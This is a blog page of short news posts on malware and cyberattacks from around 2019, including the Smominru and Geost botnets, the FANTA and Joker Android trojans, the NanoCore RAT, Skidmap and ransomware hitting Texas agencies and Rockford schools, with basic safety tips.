Search This Blog

Showing posts with label malware. Show all posts

HP Patches a Critical Vulnerability Targeting Windows Pcs


A critical vulnerability that uses unmonitored privilege escalation in the Open Hardware Monitor tool in order to infect Windows PCs that run software's dependent on it was as of late discovered by security research firm SafeBreach.

HP has already issued a patch fixing the said flaw after it came to their notice.

Among others, one of the most commonly discovered bundled software that utilizes the Open Hardware Monitor is HP TouchPoint Analytics, an apparatus that keeps running on many HP laptops and desktops around the world and along these lines putting a similar number of customers in danger.
Since devices, for example, HP TouchPoint Analytics are stacked assigned services and are accordingly whitelisted by numerous 'anti-malware' tools and this is most likely one of the main reasons why the flaw is said to be a 'potentially critical' one.

Because HP's laptops and desktop systems while being utilized for personal use, are additionally broadly utilized in enterprises that manage conceivably very sensitive data. This makes the disclosure considerably more sensitive, since, through this privilege escalation process, attackers could essentially target IT administrator setups, enter specific terminals, introduce 'arbitrary and malicious' DLL files into the framework and access the machines being referred to, and thusly gain access to the high sensitivity data.

For this situation, the HP TouchPoint Analytics tool had high, root-level framework access, and being a whitelisted instrument, enabled attackers to escalate the 'system privilege' to access critical parts of the system. Potential use cases for hackers here incorporate "data theft, undetected tracking of users and critical surveillance activities."

"These types of vulnerabilities are alarming because they indicate the ease with which malicious hackers could mount supply-chain attacks targeting and breaching highly trusted elements of our software ecosystem. This should be a clear signal to security teams that they need to increase their frequency of testing and analysis of their security envelope, in order to match the pace of criminals who are constantly innovating ways to hack into the most vulnerable parts of IT systems," said Itzik Kotler, co-founder and chief technology officer of SafeBreach.

The flaw has since been patched by HP, although SafeBreach warns and makes reference to any other organization utilizing the Open Hardware Monitor tool is still possibly in danger.


Smominru Botnet Affecting Over 4,000 Windows Systems Every Day


Affecting Windows machines across the globe, Smominru has been labeled as one of the most rapidly spreading botnet malware, as per a report by data center and cloud security company, Guardicore Labs. The infection rate of this computer malware has been detected to be up to 47,000 machines per day and in the month of August alone, it compromised almost 90,000 computers, according to the report.

While attacking, Smominru compromises Windows PCs by using the NSA exploit, EternalBlue and brute-force on various services like RDP, TELNET, MS-SQL, and others. The malware is configured to steal the target's credentials and then install a cryptominer and Trojan module to compromise the network. After establishing a foothold, the malware moves laterally to affect as many systems as it potentially can inside the targeted organization.

Reportedly, the US, Russia, China, Taiwan, and Brazil witnessed the maximum number of attacks, however, other countries remain equally vulnerable to the computer malware which saw an upsurge in recent times. To exemplify, we can look at the largest network targeted and hence compromised by Smominru, which was a healthcare provider in Italy, it left a total of 65 hosts affected.

The unspecified and non-targeted nature of the attacks was notable as the compromised networks ranged from medical firms to higher-education institutions, the victims infected by the malware included cybersecurity companies as well.

It has been discovered that around 85% of the attacks are carried out on Windows 7 and Windows Server 2008 systems, while, some others are observed to be taking place on Windows XP, Windows Server 2012, and Windows Server 2003.

Seemingly, the failure of company administrators to timely patch their computer networks and servers is one of the primary reasons for the networks being compromised, although for a lot of organizations, the inability is a result of logistical scarcity, but, for others, it's simply due to negligence and not being regularly updated with the requirements of the sector.

Experts found a fraudulent network that infected about 800 thousand Android phones in the Russian Federation


A large-scale hacker attack was discovered, the victims of which were about 800 thousand smartphones in Russia. Criminals managed to get access to several million Euros in the Bank accounts of Russians.

It is clarified that Avast specialists determined that the Russian smartphones were attacked by a banking botnet that collects information and personal data. The infection has occurred since 2016.

It turned out that all infected devices were connected to Geost. As a result, attackers were able to remotely control the gadget. Hackers could send and receive SMS messages. The dangerous program was disguised as various banking services and social media applications, so it was easy to download it. The main targets of the Trojan were five banks located in Russia and Android devices.

Geost botnet used 13 command and control servers to launch hundreds of malicious domains. It was possible to expose it because of the mistake made by the scammers. They used a proxy network created by the malware HtBot, in which information was not encrypted. So, experts were able to find personal correspondence of criminals, which mentioned money laundering.

According to Avast employee Anna Shirokova, the company managed to gain access to the correspondence of cybercriminals and malware. "We got a really unprecedented idea of how such groups work," Shirokova shares her success. In total, experts studied eight months of correspondence, which was attended by 29 of the attackers.

The exact amount of theft is not called. Avast also did not specify who exactly was involved in the creation of the botnet.

According to researchers, the Geost botnet could control several billion rubles in the accounts of victims.

Earlier, E Hacking News reported that International company Group-IB has recorded a new Android Trojan campaign, the victims of which are customers of 70 banks, payment systems, web-wallets in the Russian Federation and the CIS. The potential damage from the Trojan, called FANTA, amounted to at least 35 million rubles ($547,000). According to the company, the Trojan is aimed, in particular, at users who place purchase and sale advertisements on a Russian classified advertisements website Avito.

US: Fake News and Hike in Malicious Campaigns



'The internet is stacked with fake news sites in the present times,' says the research of Domain Tools, a security analyst company. The company scrutinized some top news sites of the U.S and examined their vulnerability to URL hacking and false domains. The false URLs may advertise misinformation and harmful malware, according to study. “As skepticism of traditional media continues to rise, defending the society from fake news attacks has grown relevant to the constitutional process,” says Corin Imai, a security advisor of DomainTools.

The fake news in recent times has attacked the credibility of news and raised questions concerning professional journalism. In present times, the media coverage is full of falsehoods and misinformation. The majority of the mainstream news sites can be held responsible for spreading fake news among the general public.

Why should one pay attention to fake news sites? 

'It’s no mystery that since recent times fake news campaigns are on a hike,' says Imai. 'The research shows that various top news websites' domain names have been tricked, and are vulnerable to URL hacking.' Honesty and assurance are the pillars of splendid consumer aid expertise. The study by Domain Tools reveals how wicked users do clever tricks like typosquatting and replicating domains as methods to wind up fake news campaigns.

Typosquatting, also called URL hijacking, is a technique that clings on internet users who accidentally type a wrong domain while searching for a news site on a browser. Whereas, spoofing is when a trickster acts as a genuine publisher of a news site. These unlawful actions can result in unauthorized stealing of user data, circulate fake news via spoofing news sites and, download dangerous malware into the user's system.

How to identify misinformation campaigns and stay safe from fake news sites- 

Fake news sites often benefit from user's browsing pace by hogging on their favored source of information. This can lead to data theft or vulnerability to fake news and malware.
Steps to avoid fake news-

• Beware of suspicious or doubtful domain names. Always pay attention to whether the web search is correct.
• Bookmark your preferred news site. This benefit in avoiding typos while searching for a news site.
• Visit the news website directly; avoid clicking on links that lead to news or information.
• Be digitally literate. Stay up to date with the latest trends and technologies happening over the internet.

By following these basic precautions, one can be safe from the risk of fake news.

Google Takes Down Around 46 Apps by Chinese Developers from its Play Store


Last week, around 46 apps by a Chinese developer, iHandy were taken down by Google from its Play Store. Initially, Google declined to provide reasons for the sudden removal of various security, horoscope, selfie, health and antivirus related apps which were downloaded over millions of times.

However, a total of eight apps were still present on Google’s Play Store, until three more were taken down, as per a Buzzfeed report. The Chinese company, established in the year 2008, claims to have almost 180 million monthly active users in more than 200 countries across the globe. Currently going through investigations, iHandy is one of the world’s largest mobile application developers.

In a conversation with Buzzfeed, iHandy VP Simon Zhu, while expressing how they found Google’s takedown quite unexpected, said “It is an unexpected action from our point of view. We are trying to find out the reasons. Hope the apps will be back to Play Store as soon as possible.”

Notably, Google has taken down apps made by Chinese developers in the past as well for various reasons; in this case, the removal is triggered by deceptive and disruptive ads. In August this year, after Trend Micro discovered malware inside certain apps, Google removed a total of 85 apps from its Play Store, most of these apps were related to gaming or photography and had more than 8 million downloads. The most popular names among these infected apps included, ‘Super Selfie’, ‘Cos Camera’, ‘One Stroke Line Puzzle’ and ‘Pop Camera’.

To exemplify, a very popular app known as ‘Sweet Camera- Selfie Beauty Camera, Filters’ which had over 50 million downloads was also removed in the process and it is not to be found on the Indian Play Store either.

Researchers discovered that all of these infected apps were put on the Play Store via distinct developer accounts and were signed by non-identical digital certificates, but they exhibited the same behaviors and shared a similar code.

Referenced from the statements given by Google’s spokesperson, "Our Google Play developer policies are designed to help create the best experience for users, and we explicitly prohibit deceptive or disruptive ads. When violations are found, we take action,"

Avito users were targeted by a dangerous Android Trojan


International company Group-IB, which specializes in the prevention of cyber attacks, has recorded a new Android Trojan campaign, the victims of which are customers of 70 banks, payment systems, web-wallets in the Russian Federation and the CIS. The potential damage from the Trojan, called FANTA, amounted to at least 35 million rubles ($547,000).

FANTA belongs to the Flexnet malware family, which is known to experts since 2015 and studied in detail. The Trojan and its associated infrastructure are constantly evolving: attackers are developing more effective distribution schemes, adding new functionality to more effectively steal money from infected devices and bypass security measures.

According to the company, the Trojan is aimed, in particular, at users who place purchase and sale advertisements on a Russian classified advertisements website Avito.

Attackers find contact details of sellers in a network, and after a while the victim receives personalised SMS about the transfer of full cost of goods to his account. The message contains a link where sellers can find payment details. Then the link opens a phishing page on the Avito website, which notifies the seller of the purchase and contains a description of his goods and the amount received from the sale of the goods. After clicking on the "Continue" bottom, FANTA malware disguised as the Avito application is downloaded to the phone.

The receipt of bank card data is carried out in a standard way for Android Trojans: the user opens phishing site that disguises as legitimate mobile banking application where the victim enters their bank card details", the Group-IB described the scheme of attackers.

Moreover, FANTA analyzes which apps are running on the infected device. Experts found that in addition to demonstrating pre-prepared phishing pages, FANTA also reads the notifications text about 70 banking applications, fast payment systems and e-wallets. In addition, an important feature of FANTA, which the creators paid special attention, is the bypass of anti-virus tools.

According to Group-IB, the latest attack was aimed at Russian — speaking users, most of the infected devices are located in Russia, a smaller part is in Ukraine, Kazakhstan and Belarus.
It's interesting to note that FANTA developers are able to hack the devices of users of about 30 different Internet services, such as AliExpress, Youla, Pandao, Aviasales, Booking, Trivago, as well as taxi and car sharing services.

Earlier in another Russian service of free ads Youla stated that the company plan to completely remove the display numbers, keeping all communications within the service.

Skidmap, Linux Malware Mining Cryptocurrency in Disguise



A new strain of Linux malware has been discovered by security researchers, which is configured to carry out a multitude of malicious activities besides just illegally mining cryptocurrency; by using a "secret master password" it provides hackers the universal access to the system.

Skidmap, Linux malware demonstrates the increased convolutions in Cryptocurrency mining malware and prevalence of the corresponding threats.

In order to carry out its cryptocurrency mining in disguise, Skidmap forges CPU-related statistics and network traffic, according to TrendMicro's recent blog on the subject.

Highlighting the advanced methods used by Skidmap, researchers at TrendMicro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How the infection takes place?

It starts in 'crontab', which is a standard Linux process responsible for periodically scheduling timed tasks in Unix-like systems. After that, Skidmap installs various malicious binaries and then the security settings of the affected machine are being minimized to start the cryptocurrency mining smoothly.

As the cryptocurrency miners generate digital money for the hackers, they are being monitored by some additional binaries put into the system for the same.

To stay guarded against the aforementioned Cryptocurrency mining malware, admins are advised to update and patch their servers and machines ,and be alert to unverified repositories.

Beware: Malware Hidden Inside Online School Textbooks?




Security experts have warned to be aware of malware disguised as online version of textbooks. Thousands of textbooks were found to be affected by this technique.

This scam basically works on the weaknesses of online shoppers and people who like to look for everything online. In order to cut the cost people try to download/purchase them online.

Over 3,50,000 attacks via this scamming technique have already been registered. Potentially unwanted files are also disguised as ready-made essays and textbooks.

Per sources, over 2000 of these disguised books were of English, around 1200 of them were of Mathematics and more than 850 books were of literature.

The books were a cover up for various threat actors ranging from not-so-serious adware or “unrequested software” to highly severe malware.

Students looking for cheap or even free textbooks for their university or schools create avenues for cybercriminals happen to be their main target.

This is a serious issue because if by any chance this or any other severe threat actor gets administered via these disguised books into a school’s network, a lot of people would get compromised.

The students and the school for that matter should be cyber-aware and make sure they don’t download any unauthenticated file from any illegitimate source just because it’s free.

Download anti-virus software, sit tight on security, steer clear of unknown email IDs and try not to dwell so much on online means.

ATTENTION ANDROID USERS: REMOVE THESE APPS IMMEDIATELY!




A minimum of 24 extremely popular android applications were found to be infested with malware. They were tested positively with Trojan which is known by the name of “Joker”.

Per sources, this Trojan provokes the interaction of the device with advertisement websites. It could steal SMS messages and private data.

As per the sources following are the names of the applications that are being said to be infested with the Trojan:
  • Beach Camera 4.2
  • Mini Camera 1.0.2
  • Soby Camera 1.0.1
  • Declare Message 10.02
  • Rapid Face Scanner 10.02
  • Leaf Face Scanner 1.0.3
  • Spark Wallpaper 1.1.11
  • Humour Camera 1.1.5
  • Rudy SMS Mod
  • Antivirus Security – Security Scan, App Lock 1.1.2
  • Collate Face Scanner 1.1.2
  • Ignite Clean 7.3
  • Advocate Wallpaper 1.1.9
  • Print Plan scan 1.03
  • Great VPN 2.0
  • Climate SMS 3.5
  • Dazzle Wallpaper 1.0.1
  • Cute Camera 1.04
  • Board Picture editing 1.1.2
  • Altar Message 1.5
  • Age Face 1.1.2
  • Reward Clean 1.1.6
  • Certain Wallpaper 1.02
  • Mini Camera 1.0.2

Security researchers strictly advise every user to uninstall any of these applications if found in their devices.

Ransomware Attack Locks the Internet Service in Public Schools of Rockford





Due to a ransomware attack, the public schools in Rockford, Illinois are working without the internet service; whether it may be phone or a computer system everything has been affected.

The schools originally experienced the problem with its phone and internet services on Friday yet classes for around 28,000 students in 47 schools resumed by Monday in spite of outages as yet impacting the school buildings and the nearby district offices.

The ransomware in this way distinguished is said to be a kind of malware, or malevolent software, regularly spread through emails containing link or attachments that 'encrypt' a user's documents or systems, preventing them from accessing the data.

In a statement on Monday, the school officials said that experts are helping the district's technology team assess the outage. The locale says its authorities are attempting to get a 'complete picture' of the episode and see how it impacts its data.

However it is still under wraps as to with whom the school district is working with to thusly find the root cause of the whole problem, whether it is working with local, and state or federal law enforcement agencies.

Hackers hiding malware behind Captcha







Hackers are hiding malware inside the Captcha to evade email security gateways. This technique helps attackers in establishing the authencity of the email. 

There are various social engineering methods that are used by the hackers in tricking users to believe them. 

A new email campaign using an email id @avis.ne.jp, alerts recipients that they received a voice message.  The voice attached with a preview tempts users to listen to the full message.

The email contains a play button, which directs users to the page that contains captcha, this step is to bypass the automated analysis tools and to bypass secure email gateways.

The malicious page asks users to select a Microsoft account to log in when the victim login all their credentials are captured.

“Both pages are legitimate Microsoft top-level domains, so when checking these against domain reputation databases we receive a false negative and the pages come back as safe,” reads Cofense report.

Before clicking on any link attached to the email, the user should investigate that the website is safe or not. 


CamScanner Returns After Being Removed by Google for Having Malware



Researchers at multinational cybersecurity company, Kaspersky Labs, discovered a malicious module in the widely used mobile scanning app, CamScanner. As a result of the discovery, the app was taken down by Google from its play store last week. Seemingly, the iOS version of the app remained unaffected by the malware.

On 5th September 2019, the developers of the popular PDF creator app, announced its comeback on their official Twitter handle. Reportedly, they have removed all advertising SDKs in the latest version of CamScanner, i.e., version 5.12.5, which can be downloaded by the users from Google Play Store.

There were issues in the previous version of the app, however, the app, CamScanner in itself is a completely authentic and widely used application.



According to the researchers at Kaspersky Labs, “Recent versions of the app shipped with an advertising library containing a malicious module,”

“The module is a Trojan-Dropper that means the module extracts and runs another malicious module from an encrypted file included in the app’s resources. This “dropped” malware, in turn, is a Trojan-Downloader that downloads more malicious modules depending on what its creators are up to at the moment,” they added.

The Trojan-Dropper module which is called as “Trojan-Dropper.AndroidOS.Necro.n”  is configured to befool users into signing up for paid subscriptions by showing them intrusive advertisements.

Resurgence in Ransomware Being Driven By a Surge of New Malware Families


A US based cyber security firm through its most recent threat report observed a 118% increase in new Ransomware strains basically in the first quarter of 2019 as compared with the last of 2018. It believes that the resurgence in ransomware is being driven by a flood of new malware families that are regularly more focused on.

The firm discovered that attackers were targeting the governments and organizations which were followed by companies in the financial, chemical, defence and education sectors. Their information corresponded with an ever expanding number of ransomware attacks standing out as truly newsworthy, especially US governments and urban communities, very much like the Texas Ransomware attack.

This new spate of ransomware attacks is said to have been a move away from 'spray and pray' ransomware strategies, in such targeted attacks, spear phishing – sending vindictive emails from an "apparently trusted person"  – is progressively being utilized to gain initial access 68% of the time.

Attackers are likewise said to have been utilizing unknown email services to oversee the ransomware crusades. The most widely recognized groups of ransomware during this period are known to be Dharma (otherwise called Crysis), GrandCrab and Ryuk.

In any case, McAfee, made some amazing disclosures also, first the cyber security firm found that culprits are turning to various attack approaches with regards to coin mining malware, like the CookieMiner malware focusing on Apple users.

Furthermore, also, it found an average of 504 'new threats per minute' in the first quarter of 2019 and noticed that more than 2.2 billion stolen account credentials were made accessible on the cybercriminal underground during the same period.

Its discoveries depend on the information accumulated from its Global Threat Intelligence cloud,, which comprises of over a billion sensors checking for different sorts of cyber dangers around the globe.

Raj Samani, McAfee fellow and chief scientist, stresses on the fact that the impact of these threats is very real and added further that “It’s important to recognise that the numbers, highlighting increases or decreases of certain types of attacks, only tell a fraction of the story. Every infection is another business dealing with outages, or a consumer-facing major fraud. And we must not forget that for every cyber-attack, there is a human cost.”

Google Project Zero Discovers Malicious Website Exploits which Affected iPhone Users



Researchers at Google Project Zero discovered an attack against iOS users which is present in the form of a malware hidden in hacked websites.

The malware stealthily installs itself for the users surfing any of the hacked websites, which have a readership base of thousands.

Once the malware is installed, it makes the iPhone act as a clandestine spying device which traces the contacts, location and messages, allowing hackers to get an overview of the victim's life and habits.

The malware extends the collection of data up to the popular third party apps such as Gmail, Whatsapp and Google Maps; it is configured to steal files and upload live location data of the owner.

The hub of white hat hackers, Google's Project Zero Division, which excelled in discovering multiple bugs and vulnerabilities, said that these attacks are based in a series of hacked sites, that were said to be randomly disseminating malware to iOS users.

The particular series of attack stands out as most of the attacks are more targeted in scope, however these attacks affected people who happened to surf one of the hacked websites.

Explaining  the issue, Ian Beer from Project Zero, says, "Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group.

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them."

Hacking Attack Neutralized: France



A recent hacking attack was neutralized by the French government where 850,000 computers had been taken control of. The malware had been removed from the infected devices.

Retadup, a software worm was responsible for taking over of the devices in the Paris region according to sources.

The number of computers infected was massive which certainly indicates that it was a gigantic operation on the part of the hackers.

The police officials created a copy of the server which was responsible for the attack and allowed the hackers get into systems and take control.

All the infected computers were advised to uninstall Retadup malware which according to researchers had a part to play in the Monero Crypto-currency creation.

A few suggestions made by the researchers to ensure safety against malware attacks included:
·       Don’t open emails from unknown senders.
·       Don’t click attachments that pretend to offer anti-viruses for free.
·       Install and activate the anti-virus software immediately.

Windows Users Beware of the “Complete Control” Hack Attack; Update Imperative!





The hardware device drivers of Microsoft Windows due to a common design flaw left the entire systems of users compromised giving it to a recently resuscitated Remote Tojan Access (RAT).

The RAT brought about a hack attack tool with a modified format which as it turns out is absolutely free of cost.

The NanoCore RAT as it’s called, has been hovering around the dark web for quite some time now. It was sold initially for $25 which is a minimal amount for a hacking tool for Windows OS.

NanoCore’s cracked version, as soon as it appeared caused quite a commotion amongst researchers and hackers.

Initially the “premium plugins” were especially paid for privileges but the latest cracked version has it all for free.

The NanoCore coder had to be arrested given the rising familiarity of the product and the fact that he was a part cybercrime!
Despite that, NanoCore thrived and generated other tool variants RAT, Surprise Ransomware, LuminosityLink and of course the free “highly modified” latest version.

The NanoCore RAT, per researchers is controlled by way of easy security measures, no particular entry troubles and a really uncomplicated interface to aid even the novice hackers.

There was an outburst of campaigns using the very malware including:
·       Remote shutdown and restart of Windows systems
·       Remote file browsing on the infected system
·       Access and control of Task Manager, mouse and Registry editor
·       Disabling webcam lights to spy
·       Taking over open webpages
·       Recovering passwords and obtaining credentials
·       Remotely operated “locker” for encryption

Owing it to the long presence of NanoCore the techniques it uses are well known to the researchers. Scripting, registry keys and malicious attachments are the three main categories that the researchers found out.


The scripting threat’s basic solution is to check Microsoft office files for macro code and “anomalous execution” of legitimate scripting programs like PowerShell or Wscript.

The registry keys should be monitored for updates and patch cycles and rigorous security implementations should be made for behavioural detection.

Windows users should immediately go ahead and get their systems updated and make sure all their applications are running the way they actually should.

Additionally, Windows 10, 8.1 and 7 users should especially keep a keen check on regular updates and patching!

State of Texas Hit By a Ransomware Attack; 23 Agencies Shut Down!





The state of Texas got hit recently by a cyber-attack as a result of which 23 government agencies were taken down offline.

Per the DIR (Department of Information Resources) of Texas most of the aggrieved parties were small local government agencies which are unnamed so far.

The Texas state networks however are still unharmed. The State Operations center of the state has been rigorously working towards the problem.

Sources mention that all the state and federal agencies handling the case hint at the fact that the attack was coordinated by a single actor.

The attack has been categorized as a sure shot ransomware attack. Per sources in it was a stain which was identified as “Nemucod”.

The aforemetioned ransomware generally “encrypts files and then at the end adds the .JSE extension”, a researcher mentioned.

Allegedly, the US have been the target for a lot of cyber-attacks of late. With an apparent total of 53% of the entire global number, the US have been victimized the most by cyber-attacks.

A state emergency was declared on Louisiana in July this year in response to a ransomware attack on school computer systems.

The situation is very critical from the point of cyber-security as municipalities falling prey to such attacks and ransomware in particular is not a good sign at all.

Mass scale attacks and their increase in number are disconcerting on so many levels. Because threat actors willing to put so many efforts, like the researchers like to say, are numerous.

Indian Army detected a Malware








Ahead of Independence Day celebrations, the Indian Army has detected a cybersecurity breach which affected a senior officer posted in Jammu and Kashmir under the Northern Command.

"The cybersecurity breach was detected by the Indian Army personnel during a routine check when malware was found in the computer of a senior officer," army sources told ANI.

However, the investigation has been started and it is being investigated how the malware found its to his computer.

Senior Army officers get a computer from the Army to carry out all the official work, and the system is connected with the Army intranet facility.

The Army keeps alerting its personnel about cyber alerts and data theft by WhatsApp and other social media platforms. They are warned of using any Chinese apps.

Recently, Pakistani intelligence agencies have Army personnel by sending them malicious links, which once clicked, downloads malware on their computers or mobile devices and steal all the information from them.

To avert this kind of malware and any kind of threat the Army has been issuing regular warnings against such issues, and ask its personnel to immediately inform the higher authority if they even have a slight doubt about their data.

The Army has been issuing regular warnings about and has asked personnel to be alert while dealing with these issues.

The Udhampur-based battalion is responsible for handling almost the entire territory of Jammu and Kashmir and Ladakh bordering both Pakistan and China.

Malware recorded video once pornographic websites are visited








ESET’s security researchers last week disclosed the discovery of new malicious malware that is being predominantly used for online extortion.

The malware popularly called as “Varenyky” was named by its founder, watches the activity of infected computer until the pornographic website is visited and then it starts recording the screen, later the video is used for blackmailing and extortion

Varenyky was first discovered in May, in France according to the ESET reports. Varenyky is designed to target French computer users. 

The malware starts by sending attached malicious code through fake email attachments as invoices in the form of Microsoft word attachments, the macro attached to malware ensures the user is French, if the targeted computer ticks its boxes, Varenyky determines which elements have to be downloaded on the target computer, and then execute macros that further install software which can steal passwords and can spy on the target system.

The moment target computer goes to the network that uses trigger keywords like “YouPorn, Pornhub, Brazzers” Varenyky starts recording computer screen using an FFmpeg executable - after that video is uploaded on the C&C server.

The risks involve blackmailing and sextortion. while the current reports suggest that the malware is relatively generic and is meant to target French computer users but in future could be potentially used to attack other individuals as well.

SystemBC: Another Malware On The Dark Web!




A fresh malware that’s being duly advertised on the dark web is SystemBC, which installs SOCKS5 proxies on the infected systems and sends through another malware.

The malware is being advertised since April and it made its first appearance in May, as the sources cite.

Per sources, it’s being distributed as a part of Fallout and RIG exploit kits which are web-oriented systems that make use of browser-based vulnerabilities to install malware.

To mislead the users into installing the malware the above-mentioned exploits also send through malicious web-pages.

Formerly an unauthenticated malware, SystemBC is majorly a demand-based proxy component for malware operators.

It can be deployed on compromised systems to shroud the malicious traffic and other malicious activities within a system.

According to researchers the malware’s main gig is to generate a SOCKS5 proxy server so that another malware could be pushed through to “bypass the local firewalls” and “internet content filters”.

Researchers vehemently advise users to patch their systems and not use older systems that use plugins that are  vulnerable to attacks as this malware is pretty difficult to detect.